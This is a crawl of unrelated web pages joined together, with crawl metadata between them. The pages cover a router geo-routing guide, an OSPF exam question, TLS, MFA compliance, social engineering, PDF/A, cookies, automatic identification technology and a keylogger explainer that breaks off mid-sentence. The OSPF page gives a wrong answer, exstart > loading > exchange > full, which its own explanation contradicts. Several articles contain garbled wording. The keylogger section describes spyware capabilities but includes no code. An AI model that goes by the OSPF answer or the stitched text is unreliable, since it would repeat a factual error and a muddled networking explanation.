natural history and conservation of the endangered cave amphibian. Developing additional basic knowledge of Proteus lays the groundwork for a more relevant and effective conservation plan for the endangered species. Arecont Vision is the leading manufacturer of high-performance megapixel IP cameras and associated software. Arecont Vision products are made in the USA and feature low-cost massively parallel image processing architectures MegaVideo® and SurroundVideo® that represent a drastic departure from traditional analog and network camera designs. All-in-one products such as the MegaDome®, MegaView™ and D4F/D4S series provide installer friendly solutions. Compact JPEG and H.264 series of cameras address cost sensitive applications. These innovative technologies enable Arecont Vision to deliver multi-megapixel digital video at IP VGA camera price points.
<urn:uuid:d4a63685-952c-48af-9230-cb42c56818ec>
CC-MAIN-2024-38
https://sales.arecontvision.com/casestudydetails/Tular+Cave+Laboratory+Observes+Rare+Amphibian+in+Megapixel+Detail
2024-09-08T03:00:04Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700650958.30/warc/CC-MAIN-20240908020844-20240908050844-00232.warc.gz
en
0.932309
2,054
3.15625
3
Vigor routers can forward the traffic through multiple outgoing interfaces, such as WAN, VPN, and LAN. Network Administrator can create the Route Policy or Static Route to regulate the forwarding interface for specific traffic. Some websites and resources have geo-restrictions. For example, Netflix provides different contents for the users in different countries, Costco website may offer the different merchandise base on the locations that customers live, BBC news only provide some video resources to the IP addresses within the UK, some online game only let the players choose the servers near their residences. To bypass these restrictions, we need to make our traffic go through the gateway in the specific country or location. Therefore, Vigor routers provide Country Object in Route Policy so that the traffic can be sent via the interface at a specific location. This note demonstrates how to set up the Route Policy to forward the traffic to the UK through the WAN1, and the traffic to the US through VPN tunnel. Note: DrayTek Router includes GeoLite2 data created by MaxMind, available from https://www.maxmind.com. 1. Create Country Object, go to Objects Setting >> Country Object page, 2. Create Route Policy, go to Routing >> Load-Balance/Route Policy page. Click an available index to edit the rule: 3. Similarly, repeat step 1 and 2, to configure a route policy to regulate traffic to the US via VPN. 4. To verify the settings, we can use traceroute . Assume that WAN1's gateway IP is 192.168.39.1, and the VPN remote gateway IP (LAN IP of the remote router in the US) is 192.168.92.1. Trace bbc.com in the UK, the traffic will go through WAN1 gateway: 192.168.39.1 Trace netflix.com in the US, we see the traffic go through VPN remote gateway: 192.168.92.1 Was this helpful?
<urn:uuid:a2fa7a6b-5ed7-4766-bd28-e24f133d1f5b>
CC-MAIN-2024-38
https://www.draytek.com/support/knowledge-base/5085
2024-09-08T03:30:48Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700650958.30/warc/CC-MAIN-20240908020844-20240908050844-00232.warc.gz
en
0.877554
414
2.515625
3
When a router undergoes the exchange protocol within OSPF, in what order does it pass through each state? Click on the arrows to vote for the correct answer A. B. C. D.B The correct answer is A. exstart state > loading state > exchange state > full state. When a router undergoes the exchange protocol within OSPF (Open Shortest Path First), it passes through four different states. These states are: exstart state: In this state, the two routers that are trying to establish an adjacency agree on their router IDs and exchange their initial sequence numbers. exchange state: In this state, the routers exchange database description packets (DBDs) that contain information about their LSAs (Link State Advertisements). loading state: In this state, the router that received the DBD packets requests the missing LSAs from the other router and begins receiving them. full state: In this state, the routers have exchanged all of their LSAs and have established a complete OSPF database. They can now forward traffic through their network. So, the correct order in which a router passes through each state during the OSPF exchange protocol is exstart state > loading state > exchange state > full state, which is option A.
<urn:uuid:cce06c03-1f49-4787-abb5-dc7f08651b67>
CC-MAIN-2024-38
https://www.exam-answer.com/cisco-ccna-exam-200-125-router-ospf-state-order
2024-09-09T07:23:56Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651092.31/warc/CC-MAIN-20240909071529-20240909101529-00132.warc.gz
en
0.960358
266
2.65625
3
Transport Layer Security (TLS) is a way to secure information as it is carried over the Internet: users browsing websites, emailing, instant messaging, and conversing via Voice Over IP (VoIP). TLS is the successor to Secure Sockets Laye (SSL) and the security it provides is a cornerstone of the modern Internet. The goal of TLS is to provide a private and secure connection between a web browser and a website server. It does this with a cryptographic handshake between to two systems using public-key cryptography (PKC). They two parties to the connection exchange a secret token, and once this token is validated by each machine it is used for all communications. The connection employs lighter symmetric cryptography to save bandwidth and processing power. Any remote services connection to a website requires some form of communication, and communication relies on a transport mechanism. To achieve a secure end-to-end communication the transport layer medium must be encrypted. Otherwise data passing through it can be compromised. The potential to steal data carried this way is not only a privacy issue, it would also be a way to steal large amounts of sensitive information. "Without TLS protecting the connections between a web sites and their users, the viability of the Internet would be in question. Sensitive information users input such as PII and CHD would be open to eavesdropping and theft, leading to mass instances of identity theft and financial fraud. There'd be no trust in online service and Internet adoption would have stalled."
<urn:uuid:b4ef38b2-d9a3-4217-8264-59cb29a7faf6>
CC-MAIN-2024-38
https://www.hypr.com/security-encyclopedia/transport-layer-security
2024-09-10T13:50:30Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651255.81/warc/CC-MAIN-20240910125411-20240910155411-00032.warc.gz
en
0.925542
302
3.90625
4
The fast-changing digital reality creates the ever-complicated maze of regulations that entrepreneurs of various sizes have to cope with. While there are several data privacy laws and industry-specific compliance standards, it is overwhelming to remain compliant in your organization. Nevertheless, it is MFA which itself is a multi-factor authentication that can significantly contribute to your regulatory compliance practice. MFA also referred to as multi-factor authentication is a security process that demands users to provide multiple forms of verification before accessing any systems, applications, or accounts. MFA is a secondary authentication of credentials which are more than just a username and password, and this will reduce the chances of unauthorized access and data breaches. Therefore, these processes enhance businesses’ standing as information-security-minded organizations that accomplish the stringent conditions set by the bodies regulating the use of such data. On the other hand, MFA can serve as a critical tool showing your organization’s commitment to customers’ data safety and business assets protection. Often, the success of a business in an era where data privacy and security are highly important can be determined by this and foster trust from both clients and regulatory authorities. How MFA Assists Businesses Get And Stay Compliant With Regulations Not only does regulatory compliance come down to avoiding fines and penalties, but it should be a clear sign that they are serious about good data management and information security. MFA plays a crucial role in this endeavor by: - Strengthening Access Controls: When the system is required to check multiple forms of verification, MFA is made to build a wall so high, beyond the reach of fraudsters, making it practically impossible for them to enter your system. This matches the set access controls feature provided by most compliance frameworks, for example, the General Data Protection Regulation (GDPR) and the Health Insurance Portability and Accountability Act (HIPAA). - Reducing the Risk of Data Breaches: Many frauds occur due to stolen credentials, which are mainly the cause of an unsuccessful data breach, and MFA significantly reduces this likelihood. A further step in securing data can be realized by a barrier that guarantees sensitive information is not accessible to non-authorized persons which is a key factor in compliance. - Demonstrating Security Best Practices: MFA as a part of the security system of your company gives a signal that you are ready to follow the newest security guidelines in your field. This can act as a determining factor in the satisfaction of security and risk management criteria agreed upon in compliance regulations e.g. PCI DSS and SOX. - Improving Incident Response and Forensics: Should a security event occur, MFA can generate helpful audit trails that can speed up and improve the investigation and response processes. Having the data to show your organization’s commitment to data protection and incident management can be necessary to demonstrate this during audits because this is often an important factor used in evaluating compliance. Data Protection And Significance Of It The inculcation of data protection is the key factor of existing business models and this is not only the matter that single IT department has to deal with. In the digital world, where data is prone to get stolen or misused without authorization, companies should make data protection strong so that society may regard them as safe to trust and serve as a partner to do business with. Failing to safeguard data can entail significant impositions including hefty fines and likely legal consequences which can be extended to reputational damage that may be hard to restore. Besides the lists of sensitive information, data breaches are also responsible for economic losses, disarrangements in workflow, and an overall loss of consumer trust. Consequently, businesses now must adopt a holistic, forward-looking data protection strategy so as to safeguard their assets, sustain their competitiveness and hence, attain compliance. How MFA Can Fortify Data Security MFA, indeed, is one of the most powerful security instruments in the data protection arsenal which can serve to impede unauthorized access and data breaches in a multi-layer way. MFA goes beyond the routine of asking users for passwords. It imposes more security layers such as biometric identity, and one-time code, so the risk of a successful attack is significantly reduced. Here’s how MFA strengthens data protection: - Mitigating the Risks of Compromised Credentials: Households are particularly employees of IT departments and financial institutions, which are considered to be heavy targets of cybercriminals. The MFA system effectively addresses the login credentials issue such that even in case the attacker obtains any user’s credentials, they are unable to penetrate the system because, for proper access, they will still require the additional verification factor like a PIN or key. - Enhancing Access Control and Visibility: MFA provides extensive access control over who has the right to access vital data and infrastructure. You can specify granular access policies that make sense depending on user roles, device types, and other surrounding details. This subsequently reduces the complexity of monitoring user activity helping to uncover some suspicious behavior. - Improving Incident Response and Forensics: Should the breakdown of the security happen, MFA can be very helpful with the provision of forensic data that will come in handy during the response and investigation process. This information is also used to prove that your company measures up to the standards set by the data protection laws and the regulators which the auditors more often tend to look out for. - Addressing Regulatory Requirements: For example, a lot of data protection and privacy regulations, GDPR, HIPAA, and PCI DSS, explicitly dictate that the use of MFA or strong authentication methods in place to secure sensitive information is imperative. MFA implantation assists your business in compliance with the regulations’ requirements which prevents the organization from wildly paying heavy fines. Common Challenges And Misconceptions About MFA Despite the evident gains of MFA, many enterprises may not want to adopt the strategy because they face complexities and misconceptions about it. These critical factors must be taken care of so that the rollout of our MFA project is done successfully. - User Adoption and Resistance to Change: Incurring the company in new authentication process can be accompanied by some resistance from employees as it is obvious that users are used to the traditional username and password approach. Implementation of good change management techniques and customizing the application with a user-friendly and easy-to-learn interface are the best ways to address the issue. - Integration Complexity: It is indeed a complicated task to join the existing systems as well as applications with MFA. In this case, harmony may need to be involved in the teamwork of the IT team and the vendors to ensure that the project implementation succeeds completely. - Cost and Resource Constraints: Cloud MFA deployment is not free of cost incurrence including the salaries of people needed for it for small and medium-scale enterprises, it is an issue worth a second thought. - MFA is Inconvenient: On the contrary, some scholars argue that the extra step required by MFA to click to perform security is high, today’s MFA solutions are the modern and convenient way to perform security, which does not interfere with productivity. - MFA is Only for Large Enterprises: Organizations of any size should imbibe the use of IT security and MFA practices. Data breaches are an issue that brings adverse impacts that do not depend on company size. - MFA is Overkill for My Business: Data protection and the related regulation spending are the most important things for the business sector of every format and MFA is a good way to increase the security level and achieve this goal. In addressing these challenges and perceptions the introduction and successful start of apprenticeship programs will have a strong foundation. Regulatory Compliance Requirements And Implementation Of MFA Regulatory compliance strategies differ based on industry and region but often include employee training in cybersecurity basics and limiting exposure to phishing and malware. MFA can find itself as the shining spearhead in the process of meeting these requirements, as it presents evidence to the public that your organization is serious about securing sensitive information. Here are some examples of how MFA can help you address specific regulatory compliance requirements: GDPR (General Data Protection Regulation): GDPR requires a firm to design and implement appropriate technical and organizational measures to protect personal data. MFA is a natural way to achieve a requirement of GDPR – strong authentication and access control. HIPAA (Health Insurance Portability and Accountability Act): HIPAA forces healthcare organizations to implement access controls and auditing processes to safeguard the PHI of electronic protected health information (ePHI). MFA constitutes a fundamental part of the process of fulfilling the laws. PCI DSS (Payment Card Industry Data Security Standard): PCI DSS, as one of the key components that ensure the safety of credit cardholder information, requires the use of multifactor authentication, like MFA. NIST (National Institute of Standards and Technology) Cybersecurity Framework: The NIST Cybersecurity Framework promotes that MFA is a best practice in the area of identity and access management, which is one of the key functions included in the “Protect” function of the framework. When deploying MFA within your organization you will have to be focused and methodical and to a large extent this will require you to take a holistic and strategic approach. This includes: - Conducting a thorough assessment of your existing security posture and compliance requirements: Identify the specifically the statutes and norms that apply to your business, and see how MFA can be of a help to you in satisfying them. - Selecting the right MFA solution: Select a supplier that offers a complete and convenient from the user’s point of MFA solution that can fit the existing systems through integration with security infrastructure. - Developing a robust implementation plan: Create a comprehensive plan for the implementation of MFA across the whole organization that includes the users’ training, change management and monitoring and maintenance routines. - Continuously reviewing and updating your MFA strategy: Assume the leadership and on a regular basis review the success of your MFA implementation and modify it if the need arises for continuous compliance and data protection. Through the adoption of a systematic and progressive way of MFA implementation, not only would your compliance with the regulation be reinforced but also the security of your business data and customers’ trust would be bolstered. It is imperative to note that in the process of data evolution in the digital era; robust data protection and regulatory compliance have an integral role to play. Facing the compliance challenges imposed by different regulations, Multi-Factor Authentication is a highly effective tool that can truly fortify your security stance and evidence your accountability towards proper data management. By adopting MFA you get a chance to improve your access controls, diminish data breach possibilities, and comply with the regulations established by the Data Protection Law. In addition, a MFA can act as hard evidence of your organization’s reliability in safeguarding sensitive data, thus making your clients and the relevant authorities also trust you. When you assail yourself to reinforce regulatory compliance and data protection, do know that MFA is not just a security action but a strategic investment for your organization’s continuity and effectiveness. The current world is unpredictable and rife with increased regulations for compliance. However, through the power of MFA, you can be assured of sustainable growth and success for your organization by tackling these challenges with confidence.
<urn:uuid:bf367ee3-dc6b-43dc-90b4-53b205a693cd>
CC-MAIN-2024-38
https://blog.avatier.com/the-role-of-mfa-in-regulatory-compliance-and-data-protection/
2024-09-17T22:10:38Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651835.53/warc/CC-MAIN-20240917204739-20240917234739-00332.warc.gz
en
0.937026
2,347
2.546875
3
Protecting Your Users from Social Engineering When it comes to information security, the weakest link might be something that no amount of software code and encryption can fully protect - your users. Social engineering is the practice of manipulating people into disclosing information that can help an attacker gain unauthorized access to your data (the Jimmy Kimmel Live show recently demonstrated a hilarious example of this). As intelligent as people are, they are also governed by factors such as fear, anxiety, empathy, bias, pride and a desire to help - all of which can be used to an attacker’s advantage.When exploring how social engineers work, it’s clear how insidious an attack can be. Attackers often only need very small pieces of information, which are individually harmless. In 2012, a writer for wired.com reported that a hacker was able to take over his digital life and gain access to his Google, Twitter and AppleID accounts. In his case, the four digits of his credit number, which were discovered from his Amazon account, were the same digits that Apple accepted for identity verification. In another case, the owner of the $50,000 @N Twitter handle, Naoki Hiroshima, was forced to give it up when an attacker used social engineering techniques to take Naoki’s GoDaddy account hostage.Despite the name sounding like one of the coolest professions to be in, social engineering is a real problem for businesses. According to a 2011 study by Check Point Software Technologies, almost half of the companies surveyed had experienced over 25 social engineering attacks in the two years prior and many cited an average incident cost exceeding $100,000. Most social engineers are motivated by financial gain, but revenge is also a factor. New employees, contractors and executive assistants are the most susceptible to social engineering attacks.Every year, the DEF CON Hacking conference holds a competition to surface the most effective social engineering techniques to answer one question - how do we protect against social engineering? Due to the covert and unpredictable nature of social engineering, it’s imperative to assume you have been and always will be a victim of social engineering attacks.Prevention involves having and enforcing strict policies to restrict access to information and physical on-premises resources, and educating users about how to identify an attack. Multiple points of identity verification (i.e., using an outbound phone call to confirm the identity of a user) are also key to ensuring that privileged information is shared with the correct person. Finally, if an attacker does gain access to a system, it’s imperative that administrators can contain damages by revoking access to accounts and remotely wiping data from devices where possible.Egnyte has partnered with Duo Security to offer a robust Two-Step Login Verification system, which IT admins can use to enforce identity verification to prevent social engineering. Egnyte also offers advanced authentication and a device control suite that allows admins to lock out user accounts and remotely wipe data on devices to mitigate the damage of unauthorized access. Get started with Egnyte today Explore our unified solution for file sharing, collaboration and data governance. LATEST PRODUCT ARTICLES Don’t miss an update Subscribe today to our newsletter to get all the updates right in your inbox.
<urn:uuid:ba65b38d-b412-474a-b881-9c9072aaca40>
CC-MAIN-2024-38
https://www.egnyte.com/blog/post/protecting-your-users-from-social-engineering
2024-09-13T02:25:11Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651506.7/warc/CC-MAIN-20240913002450-20240913032450-00832.warc.gz
en
0.951356
653
2.515625
3
A PDF/A is a special kind of PDF that ensures the visual appearance of a document remains the same, regardless of what hard- or software is used. All the information needed to display the document and its elements (think fonts, images, color information) is embedded in the file. This means the client records will remain readable even if the hard- or software used to access the private documents changes. How PDF/A is different from PDF - PDF/A is meant for preserving documents that can be restored when needed. A PDF can’t preserve documents. - PDF/A does not allow audio, video, and executable content, while PDF does. - PDF/A requires that graphics and fonts be embedded into the file, while PDF does not. This ensures that a user of a PDF/A does not need the same fonts that were used to create the original file installed on their computer to read the file. - PDF/A does not allow external content references, while PDF does. - PDF/A does not allow encryption, while PDF does. After reading this list, you might be thinking: Geez, what’s a PDF/A good for? It turns out it’s good for a lot. The Benefits of PDF/A As previously mentioned, PDF/A’s main draw is the long-term storage of digital information. This is especially useful for the financial service industry in which client information must be properly stored and destroyed. PDF/A is ISO-standardized in contrast to a PDF. It must meet certain requirements so that years from now, the look of the original file remains the same. This is especially important should a legal dispute arise. You can be confident that you can rely on PDF/A documents and that they have not been altered. You can search PDF/A documents, saving you time and money. PDF/A is a great option for digitally signed documents and records. Digital signatures recorded in the PDF/A file can be enforceable by law. PDF/A makes it easy to reuse content. The files can be easily converted to Word, HTML, or eBook formats. Using this document preservation tool will keep sensitive client records and other private information safe, accessible, and easy to search. The format can also be used for scanned documents. If your organization needs help making documents PDF/A compliant, Higher Information Group’s document conversion team can help.
<urn:uuid:ccd67e20-43c4-45b4-93ca-56d03673d761>
CC-MAIN-2024-38
https://higherinfogroup.com/what-is-a-pdf-a-and-why-should-financial-offices-care/
2024-09-20T13:34:19Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700652278.82/warc/CC-MAIN-20240920122604-20240920152604-00232.warc.gz
en
0.886013
506
2.671875
3
Updated March 8, 2023 1. What are cookies? A cookie is a small text file, web beacon, or similar technology that a website saves on your computer or mobile device when you visit the site. A cookie may be temporary and expire at the end of your browsing session or remain in the cookie file of your browser after you leave the website. For example, it enables the website to remember your actions and preferences (such as login, language, font size and other display preferences) over a period of time, so you don’t have to keep re-entering them whenever you come back to the site or browse from one page to another. Remembering your preferences with respect to the website, related products, services, or language. To enable content or services on the website for you Remembering your previous use of the website and gathering usage data (for instance, to be used for improving the website or marketing). Where relevant, cookies may allow us to remember your user ID so that you do not have to input it every time you visit our websites. 3. How to control cookies You can control and/or delete cookies as you wish – for details, see aboutcookies.org. You can delete all cookies that are already on your computer and you can set most browsers to prevent them from being placed. If you do this, however, you may have to manually adjust some preferences every time you visit a site and some services and functionalities may not work. You should be aware that disabling cookies may affect the appearance of our websites on your computer, tablet, or device. In particular, it may prevent access to any secure areas of our websites, where relevant. Disabling cookies may prevent the use of portions of our website or prevent certain parts of our website from functioning correctly. 4. Third party sites
<urn:uuid:48dc9ad3-7817-44eb-b04e-9181ad5f5ebc>
CC-MAIN-2024-38
https://www.innovativesystems.com/cookie-policy/
2024-09-12T02:06:21Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651420.25/warc/CC-MAIN-20240912011254-20240912041254-00132.warc.gz
en
0.926043
377
2.546875
3
Automatic Identification and Data Collection (AIDC) is a technological model that automates the process of identifying objects, entities, or transactions and gathering their related data. Organizations can use AIDC technologies like barcodes, biometrics, and voice recognition to streamline the data collection process and eliminate the need for labor-intensive and often unsecure manual data entry. This article explains how AIDC works and how firms across various industries are using it to automate their data identification and collection efforts. What is Automatic Identification and Data Collection (AIDC)? Automatic identification and data collection—sometimes also referred to as automatic identification and data capture—is a category of related technologies used to collect data without manual intervention. Data can be collected from an individual person or from an object, image, or sound, among other things. From unlocking your phone to scanning groceries at the self-checkout aisle, chances are you interact with AIDC technologies every day. Consider some of the most common applications of AIDC technology and how often you encounter them: - Barcodes and QR codes - Magnetic stripes (credit cards, hotel key cards) - RFID chips - Biometrics (fingerprint scanners, facial recognition) The use of AIDC technology can enhance efficiency and security and improve the accuracy and reliability of collected information. Many organizations use AIDC in an extensive array of applications, from inventory management to product tracking to secure access and ID control to interactive product marketing. How Does AIDC Work? AIDC works by orchestrating a series of technologies—hardware, software, and communication protocols—to create a seamless flow of data identification and collection processes. These processes are carried out in several stages. Data Encoding and Capture Many AIDC use cases start with users interacting directly with a device to scan a QR code or undergo a biometric scan—for example, when logging securely into a PC or operating system. This might be for accessing product information or gaining secure access to physical spaces or digital platforms. In all scenarios, AIDC starts with encoding relevant information into a specific data format for processing. This can take the form of barcodes and biometric identifiers or similar encoding formats such as quick response (QR) codes and radio frequency identification (RFID) chips like those found in toll booth transducers. The encoded data encapsulates various attributes like user authentication credentials, product details, manufacturing dates, pricing, or geographical location. Specialized devices designed to capture the encoded data from physical objects or entities are then used to read the data. Data Transmission and Processing Captured AIDC data is then sent to a designated system or server for real-time data processing over a wired connection such as USB and ethernet, or using wireless technologies like WiFi, Bluetooth, and cellular networks. Once transmitted, the collected data undergoes various processing activities, typical data validation, analysis, transformation, and integration into overarching enterprise systems like customer relationship management (CRM) systems or business intelligence (BI) platforms. This crucial phase converts raw data from the field into actionable insights for guiding strategic decision-making processes. What is AIDC Used For? Due to its general automation benefits and adaptability to specific industries and use cases, AIDC has become a staple in a wide range of applications and industries, from retail and logistics to healthcare and finance. Here are some of the most common enterprise applications for AIDC. Identification, Access Control, and Security Biometric AIDC systems ensure secure access to physical spaces, computer networks, and confidential information. One of the earliest and most common AIDC use cases involves using a key card to access an office building. Manufacturing, Logistics, and Warehousing AIDC enhances production efficiency by enabling the real-time tracking of raw materials, work-in-progress items, and finished goods, resulting in streamlined operations and reduced downtime. For example, supplier data, material inventory levels, and machine performance can be accessed and tracked throughout the production process using a combination of AIDC technologies—typically IoT and sensor devices. Once items, products, or orders are assembled, AIDC facilitates precise shipment tracking, reducing errors, enhancing order fulfillment, and enabling efficient route optimization. Medicine and Healthcare Even the most typical, non life-threatening medical and healthcare scenario calls for minimal errors and an exceedingly high degree of accuracy and precision. To this end, AIDC is being used to quickly onboard new patients—for example, scanning and updating patient status and vitals quickly through different departments—and proactively track patient health and wellness. It’s also used widely in medication management through the use of auto-refilling prescriptions using QR codes and medical equipment monitoring. Parking and Transportation AIDC-based systems are employed in toll collection, electronic ticketing, and vehicle identification, enhancing traffic management and reducing congestion. For city dwellers in particular, AIDC is a highly visible, common fixture—from barcode scanning solutions for access control to parking lots to barcode-based ticket validation devices at train stations. Retail and Inventory Management AIDC technologies like barcodes and RFID tags have revolutionized inventory tracking, enabling retail and shipping enterprises to implement real-time stock monitoring and more efficient supply chain management. AIDC encompasses a diverse array of technologies, each catering to distinct requirements and industries. The following is an overview of the most prominent types. Barcodes are the oldest, most basic of AIDC types, invented over 70 years ago. The technology itself has changed relatively little since then—barcodes consist of patterns of parallel lines of varying widths that together represent data when scanned by a barcode reader. These days, this elemental AIDC type is a cornerstone of retail and inventory management, offering a cost-effective and efficient solution for standardized data collection across industries. Biometric AIDC uses a person’s unique physiological or behavioral traits for identification purposes. Common biometric identifiers include fingerprints, iris patterns, facial features, voiceprints, and even gait patterns derived through visual analysis. The Biometrics Institute has defined 16 different types of biometrics for automatically identifying people by their unique physical characteristics. Because they offer a high level of security and accuracy, biometrics are ideal for applications that demand stringent security and strong authentication measures (e.g., secure access control, employee time tracking, and identity verification). DNA | Ear shape/features | Eyes—iris | Eyes—retina | Eyes—scleral vein | Face | Finger geometry | Fingerprint | Gait | Hand geometry | Heartbeat | Keystrokes (typing) | Odor | Signature | Vascular (vein) | Voice | The Biometrics Institute has identified and defined 16 types of biometrics that can be used to automatically identify people by their unique physical characteristics. Near Field Communication (NFC) NFC is a subtype of RFID that enables short-range communications between devices. NFC-enabled devices can establish connections by being in close proximity, typically within a few centimeters, for applications in contactless payment systems, access control, and data exchange between devices like smartphones and point-of-sale terminals. A close cousin of the barcode, the QR code was developed for parts tracking during the automobile assembly process. These two-dimensional barcodes are capable of storing more data than traditional linear barcodes and can support a wide range of data types, including website URLs, contact information, product details, and more. QR codes have gained immense popularity due to their versatility, enabling marketers to engage customers with interactive content and information. RFID technology uses radio frequency signals to enable wireless communication between an RFID tag and a reader. RFID tags come in passive and active form. Passive tags derive power from the reader’s signal and are suitable for applications like inventory management and supply chain tracking. Active tags have their own power source and can transmit data over longer distances, making them suitable for scenarios such as vehicle tracking and large-scale logistics. Benefits of AIDC Though AIDC technologies have been around for some time, they remain relevant due to their balance of simplicity, efficiency, security, and affordability. Each of the many types of AIDC offers a unique set of advantages—they should be selected based on application requirements, industry standards, and specific security considerations, among other factors. Regardless of the type, firms that implement AIDC technologies generally realize a wide range of benefits. Here are some of the most prominent. Accuracy and Efficiency AIDC systems virtually eliminate errors associated with manual data entry, leading to more accurate and reliable data collection. By eliminating typos and human mistakes, organizations can achieve a high level of data accuracy and more reliable strategic decision-making. The automation of data collection reduces the time required to gather information, allowing employees to focus on more high order, value-added tasks. This optimization of human resources in turn boosts the enterprise’s overall operational efficiency. Enhanced Customer Experience AIDC technologies are especially prevalent in retail environments where they enhance customer experiences by simplifying processes like product information requests and checking out/completing purchases. By expediting and automating these previously high-touch interactions, AIDC helps to enhance customer satisfaction and loyalty through shorter wait times and smoother interactions. Real-Time Insights and Inventory Management AIDC technologies provide real-time data, enabling businesses to make informed decisions promptly. This agility enables organizations to respond promptly to changing conditions in response to market conditions and competitive activity. In retail, logistics, and warehousing, AIDC expedites and streamlines inventory tracking, helping to minimize stock-outs and reduce excess inventory. The results are leaner operations and improved levels of customer satisfaction. Biometric AIDC technologies ensure secure access to sensitive physical areas and environments, safeguarding both tangible and digital assets. By relying on unique physiological identifiers for authentication, biometric AIDC ensures that only authorized personnel are granted access to sensitive physical areas and online/offline resources. Bottom Line: Automating ID and Data Collection Despite being a relatively older set of technologies, automated identification and data collection (AIDC) continues to drive innovation and operational efficiency in modern enterprises and industries. Businesses apply the wide range of technologies to an even wider range of use cases that automate data collection, enhance accuracy, streamline operations, and improve security. Because it’s cost effective to implement, accurate, generally easy to use, and useful in many different applications, AIDC has become an indispensable tool in today’s data-driven world and will likely hold its place for the indefinite future. To learn more about software to help turn collected data into actionable insights, read Top 7 Data Analytics Tools next.
<urn:uuid:6a66aaea-82fe-441e-a318-49abc416e94a>
CC-MAIN-2024-38
https://www.datamation.com/big-data/automatic-identification-and-data-capture-aidc/
2024-09-13T07:49:25Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651510.65/warc/CC-MAIN-20240913070112-20240913100112-00032.warc.gz
en
0.904132
2,240
2.921875
3
A keylogger (also known as keystroke logger) is a software that monitors and records each keystroke on a keyboard and saves this information in a file or remote server. The program can collect information from computers, laptops, smartphones, and other mobile devices. Usually, such software is associated with spyware and is used for stealing passwords, logins, credit card information, and similar information. Keyloggers can be both, legal and illegal. Such tracking applications can be used in workplaces or by researching user's behavior on computers or other gadgets. Cybercriminals often take advantage of such “spying” programs too to steal personal information. However, even legal programs work without the monitored user’s knowledge and consent. Malicious actors can also use them. Therefore, these tools shouldn't be classified as less harmful threats than certain parasites. If you suspect that your keystrokes might be recorded and used for illegal purposes, you should not hesitate and check the system with reputable anti-malware software. A professional and up-to-date tool should detect and remove keylogger immediately. After that, changing all your passwords and monitoring bank transactions are crucial tasks to protect your privacy. Keyloggers can be divided into two categories – legitimate and malicious. The difference between hardware and software keyloggers There are two types of keyloggers available on the market: The hardware keylogger is a small physical device that can be dropped between the keyboard’s plug and the computer’s keyboard port. A hardware keylogger records all keystrokes and saves them into its own memory. Such a device does not rely on a particular software or a driver. Therefore, it can work in different environments. However, it does not take screenshots and can be easily found during a thorough computer inspection. Software keyloggers are divided into parasitical and legitimate applications. Malicious keyloggers are very similar to viruses and trojans. They are used by hackers to violate users' privacy. Legitimate keyloggers, also known as computer surveillance tools, are commercial products targeted mostly to parents, employers, and teachers. They allow to find out what children or employees are doing online. Ilegal and malicious use of the keylogger Practically all keyloggers seek to violate user's privacy. They can track their victims for months and even years until they are noticed. During all this time, a regular keylogger is capable of finding out as much information about the user as possible. Someone who controls a keylogger gets priceless information, including passwords, login names, credit card numbers, bank account details, contacts, interests, web browsing habits, and much more. All this information can be used to steal the victim's documents and money. The main features of the keyloggers - Logging keystrokes on the keyboard. - Taking screenshots of the user's activity on the Internet at predetermined time intervals. - Tracking user's activity by logging window titles, names of launched applications, and other specific information. - Monitoring users' online activity by recording the addresses of visited websites, entered keywords, and other similar data. - Recording login names, details of various accounts, credit card numbers, and passwords. - Capturing online chat conversations on instant messengers. - Making unauthorized copies of outgoing and incoming e-mail messages. - Saving all collected information into a file on a hard disk, and then silently sending this file to a required e-mail address. - Complicating its detection and removal. Keyloggers cannot be compared with regular computer viruses. They do not spread themselves as these threats do and, in most cases, must be installed as any other software. However, the latest examples of ransomware have also been found to have keylogger capabilities. Unfortunately, this can reveal the fact that malware will become even more sophisticated in the upcoming years. Methods used to spread and install keyloggers on the system As you already know, keyloggers can be legal and illegal. However, both of them are usually installed without the user's knowledge, but this task achieved using different methods. - A legitimate keylogger can be manually installed on the system by the developer, system's administrator, or any other user who has needed privileges for this activity. A hacker can break into the system and set up his keylogger. In both cases, a privacy threat gets installed on the system without the user’s knowledge and consent. - Malicious keyloggers can be installed on the system with the help of other parasites, such as viruses, trojans, backdoors, or other malware. They get into the system without the user's knowledge and affect everybody who uses a compromised computer. Such keyloggers do not have any uninstall functions and can be controlled only by their authors or attackers. In most of the cases, keyloggers affect computers running Microsoft Windows operating system. However, all viruses are constantly updated, so there is no guarantee that they are not capable of hijacking other popular platforms. Examples of the most dangerous keystroke loggers There are lots of different keystroke logging applications, both commercial and parasitical. The following examples illustrate typical keylogger behavior. All In One Keylogger AllInOne keylogger has been actively used to track users worldwide. It is an illegal tool. All In One Keylogger is a malicious program targeted at PC users and their personal information. Typically, people who work behind it, seek to steal as much information as possible. AllInOne KeyLogger is designed to record all user's keystrokes, take screenshots and initiate other activities. You can hardly notice this threat on your computer as it hides deep inside the system. Ardamax Keylogger is a legitimate tool mostly used for researches. However, some of its versions have already been compromised. Ardamax Keylogger is a legitimate program that was created for professional usage. However, cybercriminals managed to compromise 4.6 version of the program and used it for malicious purposes. Once users downloaded the program from the official website, the program started collecting keystrokes, recording audio, and using visual surveillance which was sent to the remote criminals' server. Invisible Stealth Keylogger Invisible Stealth Keylogger – trojan horse with keystroke-logging functions. Invisible Stealth Keylogger is the harmful trojan horse with keystroke-logging functions. This parasite not only records every user's keystroke but also gives the opportunity for the remote attacker to have unauthorized access to a compromised computer. He or she can easily download and execute arbitrary code, steal user’s vital information (passwords, e-mail messages or bank account details). Once it collects the needed amount of data, this threat sends it to the attacker through a background Internet connection. Moreover, they can cause general system instability and even corrupt files or installed applications. Perfect keylogger is used to collects users’ keystrokes and passwords, take screenshots and use other methods to track users. Perfect Keylogger is a complex computer surveillance tool with rich functionality. It records all user keystrokes and passwords, takes screenshots, tracks user activity on the Internet, captures chat conversations and e-mail messages. Perfect Keylogger can be remotely controlled. It can send gathered data to a configurable e-mail address or upload it to a predefined FTP server. Although it is a commercial product, 